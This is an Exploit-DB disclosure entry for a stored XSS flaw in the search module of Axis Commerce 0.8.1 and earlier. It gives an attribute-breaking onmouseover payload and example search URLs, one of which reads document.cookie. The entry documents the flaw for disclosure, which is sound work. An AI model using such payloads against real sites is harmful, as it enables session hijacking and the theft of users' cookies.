Axis Commerce E-Commerce System Stored XSS

2011-08-20T00:00:00
ID EDB-ID:17703
Type exploitdb
Reporter Eyup CELIK
Modified 2011-08-20T00:00:00

Description

Axis Commerce (E-Commerce System) Stored XSS. Webapps exploit for php platform

                                        
                                            # Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
# Version: 0.8.1 and previus
# Tested on: Apache (For Windows)

ISSUE

Vulnerable Modules => Search Module

XSS can be done using the command input

Example Code: " onmouseover=prompt(XSS Code) bad="

Example:

http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="

http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="